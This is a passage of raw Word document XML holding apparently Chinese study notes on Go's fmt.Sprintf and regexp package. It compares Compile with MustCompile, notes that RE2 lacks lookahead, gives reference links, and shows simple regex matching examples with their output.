      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC1D0E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Sprintf: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F78268D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>item := fmt.Sprintf("%s\t%d\t%d\t%f\n", data, len(data), len(charCounts), entropy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6BD9FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2796DF55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62029598" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230B23FD" w14:textId="4946BA94" w:rsidR="00773969" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="340" w:name="_Toc159779796"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：正则表达式标准库（无法前视断言）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="340"/>
    </w:p>
    <w:p w14:paraId="7D7062D8" w14:textId="77777777" w:rsidR="00773969" w:rsidRDefault="00773969" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Compile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MustCompile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A90D6" w14:textId="77777777" w:rsidR="00FA7958" w:rsidRDefault="00773969" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MustCompile()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个编译好的正则表达式对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD4B62" w14:textId="77777777" w:rsidR="00FA7958" w:rsidRDefault="00773969" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假如</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>正则表达式非法，那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Compile()</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法回返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8CF2AD" w14:textId="078E108F" w:rsidR="00773969" w:rsidRDefault="00773969" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MustCompile()</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>编译非法正则表达式时不会返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，而是回</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7958">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DF445" w14:textId="00C6BE36" w:rsidR="00FA7958" w:rsidRDefault="00FA7958" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用这两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>compile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个正则表达式都是常见的，区别就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Compile</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要接收，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MustCompile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，比较好用一些。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E2054" w14:textId="77777777" w:rsidR="00773969" w:rsidRDefault="00773969" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6594C10A" w14:textId="253C6A9A" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意参考</w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidR="00C138DC" w:rsidRPr="00DD10BF">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://github.com/google/re2/wiki/Syntax</w:t>
        </w:r>
        <w:r w:rsidR="00C138DC" w:rsidRPr="00DD10BF">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>，</w:t>
        </w:r>
        <w:r w:rsidR="00C138DC" w:rsidRPr="00DD10BF">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>golang</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C138DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00C138DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regexp</w:t>
      </w:r>
      <w:r w:rsidR="00C138DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不支持零宽断言</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BE90A0" w14:textId="0DDCEB3C" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F39093A" w14:textId="0972A4A1" w:rsidR="00E6447C" w:rsidRDefault="00E6447C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6447C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>正则表达式编译的地方使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6447C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6447C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6447C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6447C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6447C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F05201D" w14:textId="77777777" w:rsidR="00E6447C" w:rsidRDefault="00E6447C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067C2667" w14:textId="554DAEB1" w:rsidR="00A11957" w:rsidRDefault="00A11957" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正则表达式的捕获组和非捕获组：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20339D56" w14:textId="5EAE0162" w:rsidR="00A11957" w:rsidRPr="00A11957" w:rsidRDefault="00A11957" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A11957">
        <w:lastRenderedPageBreak/>
        <w:t>https://segmentfault.com/a/1190000021043947</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5D0E77" w14:textId="77777777" w:rsidR="00A11957" w:rsidRDefault="00A11957" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BF047F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正则表达式规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId104" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://c.biancheng.net/view/5124.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="661C42B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://colobu.com/2020/11/11/golang-regex-replace-example/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65386ABA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40635243" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf := "abc azc a7c aac 888 a9c  tac"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D57B55F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析正则表达式，如果成功返回解释器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D5DFF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>reg1 := regexp.MustCompile(`a.c`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFDFA7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if reg1 == nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7FA5F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        fmt.Println("regexp err")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250EC7AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430F14AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34995970" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据规则提取关键信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A08EBAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>result1 := reg1.FindAllStringSubmatch(buf, -1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43469C26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("result1 = ", result1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E13626" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E70934" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258C89D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>result1 =  [[abc] [azc] [a7c] [aac] [a9c]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4314F5C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16254C07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE26AA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>result := reg.FindAllString(buf, -1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C218446" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDC267A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BD073D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB7EBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C9C863" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1972DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "regexp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57FCD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "strconv"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308AE626" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BABFBD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE89415" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885DFF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    searchIn := "John: 2578.34 William: 4567.23 Steve: 5632.18"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ECF332" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pat := "[0-9]+.[0-9]+"          //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673AAC6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    f := func(s string) string{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F543E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        v, _ := strconv.ParseFloat(s, 32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3A2C16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return strconv.FormatFloat(v * 2, 'f', 2, 32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA32EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18401CA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if ok, _ :=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> regexp.Match(pat, []byte(searchIn));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ok {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E978D0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        fmt.Println("Match Found!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B24E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1192C101" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
